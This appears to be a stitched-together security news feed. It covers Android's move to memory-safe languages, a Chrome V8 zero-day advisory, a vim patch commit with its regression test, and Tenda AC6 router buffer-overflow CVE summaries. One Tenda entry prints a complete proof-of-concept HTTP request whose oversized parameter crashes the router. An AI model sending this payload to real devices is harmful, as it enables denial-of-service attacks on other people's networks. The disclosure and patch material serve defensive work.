Categories: News
Tags: Memory safe languages

Tags:  Rust

Tags:  statistics

Google says that support for memory-safe languages like Rust has improved the overall security of the Android operating system.



(Read more...)




The post Android is slowly mastering memory management vulnerabilities appeared first on Malwarebytes Labs.

Recently we wrote about why the NSA wants you to shift to memory safe programming languages. The short version is: If you ever read our posts describing security vulnerabilities, you will see a _lot_ of phrases like "buffer overflow", "failure to release memory", "use after free", "memory corruption", and "memory leak". These are all memory management issues. And the best way to prevent memory management issues is to use a memory-safe language, which manages memory automatically instead of relying on a programmer to code things correctly.

Hot on the heels of the NSA, Google has just published an article on its security blog that provides some numbers to support agency's point of view. Google reports that it's seeing a significant drop in memory safety vulnerabilities in the Android operating system as the use of memory safe programming languages increases.

**The numbers**

I’ve always been a stickler for statistics, but you have to consider the source, the population, and the boundaries for each category, before you know what they are telling you. And unless the publisher is trying to manipulate you into a conclusion by using pseudoscientific claims not based on the presented data, statistics allow you to demonstrate the correlation between cause and effect.

**Effect**

The Google security team looked at the vulnerabilities reported in the Android security bulletin, which includes critical/high severity vulnerabilities reported through its vulnerability rewards program, and vulnerabilities reported internally. It noticed that the number of memory safety vulnerabilities has shown a year-on-year decline each year since 2019. In 2019 there were 223. In 2022 there were 85.

**Cause**

This drop in memory safety vulnerabilities coincides with a shift in programming languages. With the introduction of memory-safe languages like Kotlin, Java, and Rust in the development of the Android operating system, the contributions to the software that ties everything together in the background coded in C and C++ have gone down considerably.

**Other possible causes**

So, we can see a clear correlation between writing in memory-safe languages and the number of memory related vulnerabilities that were reported. But correlation does not always mean there is an actual causality. There could be other factors at play.

Software bugs are found and fixed over time, so we can expect the number of bugs in mature code that is being maintained but not actively developed to go down over time.

To demonstrate this is not the reason for the correlation, the Google team looked at new low-level components that require a systems language which would previously have been implemented in C++, but were coded in Rust. The result was impressive:

> To date, there have been zero memory safety vulnerabilities discovered in Android’s Rust code.

There are approximately 1.5 million lines of Rust code in the Android Open Source Project (AOSP) across new functionality. According to Google, historically the vulnerability density is greater than one vulnerability per thousand lines of code. If Rust had followed that example, it would have rendered hundreds, if not thousands of vulnerabilities.

**Side effects**

To doublecheck the causality, the Google team also looked at vulnerabilities that were not memory related. The total number of vulnerabilities has stayed somewhat steady over the past four years at around 20 per month, even though the number of memory safety vulnerabilities has gone down significantly.

Because of the difference in severity between memory-related bugs and others, the overall severity of the found vulnerabilities has gone down, along with the number of memory safety vulnerabilities. Memory safety vulnerabilities are usually much more valuable to an attacker because of the impact they can have. Exploiting a code execution vulnerability in a process grants access not just to a specific resource, but everything that that process has access to, including attack surface to other processes.

Some tasks require or work better with manual memory management, so memory-unsafe classes or functions exist that allow the programmer more freedom in exchange for the increased risk. In practice, this means that memory safe languages need an escape hatch. Rust for example, has the unsafe{} escape hatch which allows interacting with system resources and non-Rust code.

Where these “unsafe” escapes are used, Google pays extra attention to the code in order to rule out any situations that may lead to vulnerabilities.

Increasing the security around unsafe code often means adding more code, such as additional sandboxing, sanitizers, runtime mitigations, and hardware protections. These all negatively impact code size, memory, and performance.

**To be continued**

Migrating away from C/C++ is challenging, but the Android developers are making progress. The aim is to use Rust anywhere in the codebase where native code is required. And with support for Rust landing in Linux 6.1, Google says it expects to bring memory safety to the kernel, starting with kernel drivers.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Android is slowly mastering memory management vulnerabilities

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0742.

CVE-2022-3491: huntr – Security Bounties for any GitHub repository

Search giant Google on Friday released an out-of-band security update to fix a new actively exploited zero-day flaw in its Chrome web browser.
The high-severity flaw, tracked as CVE-2022-4262, concerns a type confusion bug in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on November 29, 2022.
Type confusion

Threat Detection / Zero Day

Search giant Google on Friday released an out-of-band security update to fix a new actively exploited zero-day flaw in its Chrome web browser.

The high-severity flaw, tracked as CVE-2022-4262, concerns a type confusion bug in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on November 29, 2022.

Type confusion vulnerabilities could be weaponized by threat actors to perform out-of-bounds memory access, or lead to a crash and arbitrary code execution.

According to the NIST's National Vulnerability Database, the flaw permits a "remote attacker to potentially exploit heap corruption via a crafted HTML page."

Google acknowledged active exploitation of the vulnerability but stopped short of sharing additional specifics to prevent further abuse.

CVE-2022-4262 is the fourth actively exploited type confusion flaw that Google has addressed since the start of the year. It's also the ninth zero-day flaw in Chrome attackers have exploited in the wild in 2022 -

*   **CVE-2022-0609** - Use-after-free in Animation
*   **CVE-2022-1096** - Type confusion in V8
*   **CVE-2022-1364** - Type confusion in V8
*   **CVE-2022-2294** - Heap buffer overflow in WebRTC
*   **CVE-2022-2856** - Insufficient validation of untrusted input in Intents
*   **CVE-2022-3075** - Insufficient data validation in Mojo
*   **CVE-2022-3723** - Type confusion in V8
*   **CVE-2022-4135** - Heap buffer overflow in GPU

Users are recommended to upgrade to version 108.0.5359.94 for macOS and Linux and 108.0.5359.94/.95 for Windows to mitigate potential threats.

Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Rolls Out New Chrome Browser Update to Patch Yet Another Zero-Day Vulnerability

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0765.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   In this repository All GitHub
    

*   No suggested jump to results

*   In this repository All GitHub
    
*   In this organization All GitHub
    
*   In this repository All GitHub
    

Sign in

Sign up

vim / **vim** Public

*   Notifications
*   Fork 4.5k
*   Star 29.1k
    

*   Code
*   Issues 1.2k
*   Pull requests 144
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

More

Permalink

Browse files

patch 9.0.0765: with a Visual block a put command column may go negative

Problem:    With a Visual block a put command column may go negative.
Solution:   Check that the column does not become negative.

*   Loading branch information

brammool committed

Oct 15, 2022

1 parent c8b6735 commit 36343ae0fb7247e060abfd35fb8e4337b33abb4b

Show file tree

Hide file tree

Showing **3 changed files** with **16 additions** and **0 deletions**.

*   *   register.c
    *   *   test\_visual.vim
    *   version.c

2 src/register.c

Show comments View file

@@ -1960,6 +1960,8 @@ do\_put(

// adjust '\] mark

curbuf->b\_op\_end.lnum = curwin->w\_cursor.lnum - 1;

curbuf->b\_op\_end.col = bd.textcol + totlen - 1;

if (curbuf->b\_op\_end.col < 0)

curbuf->b\_op\_end.col = 0;

curbuf->b\_op\_end.coladd = 0;

if (flags & PUT\_CURSEND)

{

12 src/testdir/test\_visual.vim

Show comments View file

@@ -483,6 +483,18 @@ func Test\_visual\_block\_put()

bw!

endfunc

  

func Test\_visual\_block\_put\_invalid()

enew!

behave mswin

norm yy

norm v)Ps/^/

" this was causing the column to become negative

silent norm ggv)P

  

bwipe!

behave xterm

endfunc

  

" Visual modes (v V CTRL-V) followed by an operator; count; repeating

func Test\_visual\_mode\_op()

new

2 src/version.c

Show comments View file

@@ -695,6 +695,8 @@ static char \*(features\[\]) =

  

static int included\_patches\[\] =

{ /\* Add new patch number below this line \*/

/\*\*/

765,

/\*\*/

764,

/\*\*/

**0 comments on commit 36343ae**

Please sign in to comment.

CVE-2022-3520: patch 9.0.0765: with a Visual block a put command column may go negative · vim/vim@36343ae

Tenda AC6V1.0 V15.03.05.19 is vulnerable to Buffer Overflow via formSetMacFilterCfg.

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/formSetMacFilterCfg request.

This vulnerability lies in the /goform/formSetMacFilterCfg page，The details are shown below:

This POC can result in a Dos.

    POST /goform/setMacFilterCfg HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 182
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/mac_filter.html?random=0.4768296248219275&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=eeg1qw
    Connection: close
    
    macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\r11

CVE-2022-45641: CVE-vulns/formSetMacFilterCfg.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceId parameter in the addWifiMacFilter function.

CVE-2022-45643: CVE-vulns/addWifiMacFilter_deviceId.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceId parameter in the formSetClientState function.

CVE-2022-45644: CVE-vulns/formSetClientState_deviceId.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceMac parameter in the addWifiMacFilter function.

CVE-2022-45645: CVE-vulns/addWifiMacFilter_derviceMac.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the limitSpeedUp parameter in the formSetClientState function.

CVE-2022-45646: CVE-vulns/formSetClientState_limitSpeed.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the limitSpeed parameter in the formSetClientState function.

Tag

#buffer_overflow